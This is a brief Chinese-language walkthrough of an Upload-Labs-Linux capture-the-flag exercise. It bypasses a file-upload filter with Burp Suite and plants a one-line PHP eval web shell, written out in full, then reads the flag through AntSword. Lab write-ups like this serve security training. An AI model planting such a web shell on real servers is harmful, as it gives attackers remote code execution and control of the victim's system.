(5) Upload-Labs-Linux(5.1) 上传一个文件,查看文件的路径,发现是 /upload/A003.jpg (5.2) 创建一个脚本文件,内容如下。然后修改文件名为图片格式 <?php @eval($_POST[1234])?> (5.3) 选择文件,开启浏览器代理,开启burpSuite的代理拦截 (5.4) bp拦截请求,修改文件名,去掉图片后缀 (5.5) 拼接链接,在蚁剑访问这个文件,设置密码“1234” (5.6) 在蚁剑找到根目录,看到了flag文件,查看flag文件内容